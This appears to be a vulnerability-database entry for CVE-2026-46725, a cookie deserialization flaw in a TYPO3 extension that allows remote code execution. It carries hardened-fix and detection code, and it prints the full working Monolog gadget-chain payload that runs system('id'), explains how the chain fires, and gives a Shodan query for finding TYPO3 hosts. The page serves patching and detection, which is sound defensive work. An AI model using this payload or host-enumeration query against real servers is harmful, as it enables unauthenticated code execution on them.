CVE-2026-46725
Published 2026-05-19
Priority: P2 (72) · Severity: critical · CVSS 4.0 base score: 9.2
Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N (threat, environmental and supplemental metrics not defined)
Exploit: public exploit available
EPSS: 2.31% (percentile 81.2)
The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with "Persistent Mode: Static" in the plugin settings.
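To make the bug class concrete, here is an added illustration in PHP. It is not code from the ceselector extension or from TYPO3, and it does not reproduce the patched code. It assumes a cookie named T3_ceselector_42 (the name pattern comes from the detection notes on this page; the uid 42 is invented), a hypothetical "selected record uids" value as the persisted state, and a server-side secret. It shows the vulnerable shape beside a hardened replacement that keeps the state as HMAC-protected JSON, plus the minimal unserialize() mitigation for a migration period.

```php
<?php
declare(strict_types=1);

// Added illustration of the bug class; not code from the ceselector extension
// or TYPO3. The cookie name follows the T3_ceselector_<uid> pattern from this
// page's detection notes; uid 42, the "selected uids" state and the secret are
// assumptions made for the example.
const COOKIE_NAME = 'T3_ceselector_42';

// VULNERABLE (CWE-502): the cookie is attacker-controlled and unserialize()
// instantiates whatever class the payload names. Any autoloadable class with a
// useful __destruct()/__wakeup() (the Monolog chain in the IOC section) becomes
// a gadget, and nothing about the request needs to be authenticated.
// Never call this with untrusted input; it is here only to show the shape.
function restoreSelectionVulnerable(array $cookies): mixed
{
    if (!isset($cookies[COOKIE_NAME])) {
        return null;
    }
    return unserialize($cookies[COOKIE_NAME]);
}

// HARDENED: persisted state is plain data, so it is stored as JSON, bound to a
// server-side secret with an HMAC, and validated field by field after decoding.
function storeSelection(array $selectedUids, string $secret): string
{
    $json = json_encode(['uids' => array_values($selectedUids)], JSON_THROW_ON_ERROR);
    $mac  = hash_hmac('sha256', $json, $secret);
    return base64_encode($json) . '.' . $mac;
}

function restoreSelectionHardened(array $cookies, string $secret): ?array
{
    $raw = $cookies[COOKIE_NAME] ?? null;
    if (!is_string($raw) || substr_count($raw, '.') !== 1) {
        return null;
    }
    [$b64, $mac] = explode('.', $raw, 2);
    $json = base64_decode($b64, true);
    // Constant-time compare, known value first: a forged or edited cookie is ignored.
    if ($json === false || !hash_equals(hash_hmac('sha256', $json, $secret), $mac)) {
        return null;
    }
    try {
        $data = json_decode($json, true, 4, JSON_THROW_ON_ERROR);
    } catch (JsonException) {
        return null;
    }
    if (!is_array($data) || !is_array($data['uids'] ?? null)) {
        return null;
    }
    // Record uids are positive integers; reject the whole cookie otherwise.
    foreach ($data['uids'] as $uid) {
        if (!is_int($uid) || $uid <= 0) {
            return null;
        }
    }
    return array_values($data['uids']);
}

// MIGRATION FALLBACK: if old serialized cookies must still be read for a while,
// forbid object instantiation. Objects in the payload come back as
// __PHP_Incomplete_Class, so no constructor, __wakeup() or __destruct() runs.
function restoreLegacySerialized(string $raw): ?array
{
    $value = @unserialize($raw, ['allowed_classes' => false, 'max_depth' => 8]);
    return is_array($value) ? $value : null;
}

// Constructed demo input: a valid cookie and the outer shape of the Monolog gadget.
$secret = 'example-only-use-a-random-secret-from-configuration';
$legit  = [COOKIE_NAME => storeSelection([3, 7, 11], $secret)];
$forged = [COOKIE_NAME => 'O:28:"Monolog\Handler\GroupHandler":0:{}'];

var_dump(restoreSelectionHardened($legit, $secret));
var_dump(restoreSelectionHardened($forged, $secret));
var_dump(restoreLegacySerialized($forged[COOKIE_NAME]));
```

The JSON-plus-HMAC route is the real fix: the cookie can no longer name a class at all. The allowed_classes => false fallback only stops gadget chains; it still accepts attacker-shaped arrays, so it belongs in a migration window, not in the final design.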
Affected (8 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mmc | ceselector | >= 0 < 3.0.3 | 3.0.3 |
| mmc | ceselector | >= 4.0.0 < 4.0.2 | 4.0.2 |
| mmc | ceselector | >= 5.0.0 < 5.0.1 | 5.0.1 |
| mmc | ceselector | >= 6.0.0 < 6.0.1 | 6.0.1 |
| typo3 | extension_content_element_selector | < 3.0.3 | 3.0.3 |
| typo3 | extension_content_element_selector | >= 4.0.0 < 4.0.2 | 4.0.2 |
| typo3 | extension_content_element_selector | >= 5.0.0 < 5.0.1 | 5.0.1 |
| typo3 | extension_content_element_selector | >= 6.0.0 < 6.0.1 | 6.0.1 |
Detection & IOCs (extracted from sources)
Payload bytes (URL-encoded cookie value as sent on the wire):
O%3A28%3A%22Monolog%5CHandler%5CGroupHandler%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00handlers%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A6%3A%7Bs%3A10%3A%22%00%2A%00handler%22%3Br%3A3%3Bs%3A13%3A%22%00%2A%00bufferSize%22%3Bi%3A1%3Bs%3A14%3A%22%00%2A%00bufferLimit%22%3Bi%3A0%3Bs%3A9%3A%22%00%2A%00buffer%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22Monolog%5CLogRecord%22%3A2%3A%7Bs%3A5%3A%22level%22%3BE%3A19%3A%22Monolog%5CLevel%3ADebug%22%3Bs%3A5%3A%22mixed%22%3Bs%3A2%3A%22id%22%3B%7D%7Ds%3A14%3A%22%00%2A%00initialized%22%3Bb%3A1%3Bs%3A13%3A%22%00%2A%00processors%22%3Ba%3A3%3A%7Bi%3A0%3Bs%3A15%3A%22get_object_vars%22%3Bi%3A1%3Bs%3A3%3A%22end%22%3Bi%3A2%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D
Decoded (the NUL bytes that frame protected property names are shown as \0):
O:28:"Monolog\Handler\GroupHandler":1:{s:11:"\0*\0handlers";a:1:{i:0;O:29:"Monolog\Handler\BufferHandler":6:{s:10:"\0*\0handler";r:3;s:13:"\0*\0bufferSize";i:1;s:14:"\0*\0bufferLimit";i:0;s:9:"\0*\0buffer";a:1:{i:0;O:17:"Monolog\LogRecord":2:{s:5:"level";E:19:"Monolog\Level:Debug";s:5:"mixed";s:2:"id";}}s:14:"\0*\0initialized";b:1;s:13:"\0*\0processors";a:3:{i:0;s:15:"get_object_vars";i:1;s:3:"end";i:2;s:6:"system";}}}}
How it fires: the back-reference r:3 points the BufferHandler's handler at the BufferHandler itself, and its processors list [get_object_vars, end, system] is applied in order to the buffered LogRecord when the buffer is flushed, so the record becomes an array, end() returns its last element "id", and system("id") runs.
- Detect exploitation attempts by inspecting HTTP requests for a cookie whose name matches T3_ceselector_<digits> and whose value is a URL-encoded PHP serialized object (starting with O%3A, or O: once decoded).
- The public exploit uses a Monolog gadget chain (GroupHandler → BufferHandler → LogRecord) with `system` as a processor to achieve RCE; alert on Monolog%5CHandler%5CGroupHandler or Monolog\Handler\GroupHandler in cookie values sent to TYPO3 endpoints.
- Successful exploitation returns the output of the Unix id command in the HTTP response body; monitor TYPO3 responses for uid=\d+\([a-zA-Z0-9_-]+\)\s+gid=\d+\([a-zA-Z0-9_-]+\).
- Exploitation is only possible when the ceselector content element is explicitly configured with "Persistent Mode: Static"; instances without that setting are not exploitable via this vector, so focus detection and patch triage on TYPO3 instances with that plugin configuration.
- Use the Shodan query http.component:"TYPO3 CMS" to enumerate internet-facing TYPO3 instances for proactive scanning; the query identifies TYPO3 itself, not the extension, so confirm the installed ceselector version on each host.
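The detection bullets above, turned into a checker. This is an added example, not part of this page's sources or of any vendor tool. It parses a raw Cookie request header, URL-decodes the value of any T3_ceselector_<digits> cookie and applies the page's indicators; it goes slightly beyond them by also flagging C: (custom-serialized) objects and other command-execution function names, and it checks a response body for id output with the page's regex. The sample headers are constructed; the malicious one is a shortened payload with the same outer shape as the IOC above, not the full working chain.

```php
<?php
declare(strict_types=1);

// Added example: applies the detection indicators listed on this page to a raw
// Cookie header and a response body. Not taken from the extension, TYPO3, or any
// vendor tool; the sample inputs at the bottom are constructed.

// Parse a raw Cookie header ("a=1; b=2") without decoding values, so the
// indicators can be matched on the exact bytes the client sent.
function parseCookieHeader(string $header): array
{
    $cookies = [];
    foreach (explode(';', $header) as $pair) {
        if (!str_contains($pair, '=')) {
            continue;
        }
        [$name, $value] = explode('=', $pair, 2);
        $cookies[trim($name)] = trim($value);
    }
    return $cookies;
}

// Returns a list of findings (empty when nothing matched).
function inspectRequestCookies(string $cookieHeader): array
{
    $findings = [];
    foreach (parseCookieHeader($cookieHeader) as $name => $raw) {
        // Only the persisted-state cookie of the ceselector plugin is of interest.
        if (!preg_match('/^T3_ceselector_\d+$/', $name)) {
            continue;
        }
        // Clients send the value URL-encoded (O%3A28%3A...); match on the decoded form.
        $decoded = rawurldecode($raw);

        // Page indicator: a PHP serialized object. "C:" (custom serialization) is
        // added here because unserialize() reaches it the same way.
        if (preg_match('/^[OC]:\d+:"/', $decoded)) {
            $findings[] = "$name: PHP serialized object in cookie value";
        }
        // Page indicator: the Monolog gadget used by the public exploit.
        if (str_contains($decoded, 'Monolog\Handler\GroupHandler')) {
            $findings[] = "$name: Monolog GroupHandler gadget chain";
        }
        // Generalisation: the usual command-execution callables carried as a
        // serialized string, which is how the processor list carries "system".
        if (preg_match('/s:\d+:"(system|exec|shell_exec|passthru|popen|proc_open)";/', $decoded)) {
            $findings[] = "$name: command-execution function name inside payload";
        }
    }
    return $findings;
}

// Page indicator for a successful hit: output of `id` in the response body.
function responseContainsIdOutput(string $body): bool
{
    return preg_match('/uid=\d+\([a-zA-Z0-9_-]+\)\s+gid=\d+\([a-zA-Z0-9_-]+\)/', $body) === 1;
}

// Constructed samples. The second cookie value is a shortened gadget with the
// same outer shape as the IOC on this page, not the full working chain.
$benignHeader = 'fe_typo_user=3f2a9c; T3_ceselector_5=a%3A1%3A%7Bi%3A0%3Bi%3A3%3B%7D';
$attackHeader = 'T3_ceselector_5=O%3A28%3A%22Monolog%5CHandler%5CGroupHandler%22%3A1%3A%7B'
    . 's%3A13%3A%22%00%2A%00processors%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22system%22%3B%7D%7D';

print_r(inspectRequestCookies($benignHeader));
print_r(inspectRequestCookies($attackHeader));
var_dump(responseContainsIdOutput('<html>uid=33(www-data) gid=33(www-data) groups=33(www-data)</html>'));
```

The checker deliberately reads the raw header (for example from a reverse-proxy or WAF log) rather than PHP's $_COOKIE, because PHP has already URL-decoded $_COOKIE and rewrites some characters in cookie names, which would hide the exact bytes the indicators describe. The benign sample carries a serialized array, which the page's indicators do not flag; that is the intended behaviour of the indicators, not a statement that serialized arrays are safe to unserialize().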
GHSA
GHSA-8x3j-439w-537c (unreviewed · 2026-05-19 · CVE-2026-46725 · CRITICAL · CWE-502): The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input
The extension passes an attacker-controlled cookie directly to PHP's unserialize() without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with "Persistent Mode: Static" in the plugin settings.
GHSA
TYPO3 Remote Code Execution in extension "Content Element Selector" (ceselector) (reviewed · 2026-05-19 · CVE-2026-46725 · CRITICAL · CWE-502)
The TYPO3 "Content Element Selector" (ceselector) extension passes an attacker-controlled cookie directly to PHP's `unserialize()` without safely processing the input. A remote, unauthenticated attacker can supply a crafted serialized payload to trigger PHP Object Injection, leading to Remote Code Execution on the TYPO3 server. Exploitation requires the content element to be configured with `Persistent Mode: Static` in the plugin settings. This has been patched in versions 3.0.3, 4.0.2, 5.0.1, and 6.0.1.
No detection rules found.
Nuclei
TYPO3 ceselector Extension - Insecure Deserialization (nuclei · CVE-2026-46725 · CRITICAL · CVSS 9.2)
The TYPO3 ceselector extension contains a PHP Object Injection: an attacker-controlled cookie is passed to unserialize() without validation, letting remote unauthenticated attackers achieve remote code execution. The exploit requires the "Persistent Mode: Static" configuration.
Template (truncated):
```yaml
id: CVE-2026-46725

info:
  name: TYPO3 ceselector Extension - Insecure Deserialization
  author: DhiyaneshDk
  severity: critical
  description: |
    TYPO3 extension contains a PHP Object Injection caused by passing attacker-controlled cookie to unserialize() without validation, letting remote unauthenticated attackers achieve remote code execution, exploit requires Persistent Mode: Static configuration.
  impact: |
    Remote unauthenticated attackers can execute arbitrary code on the
```
No writeups or analysis indexed.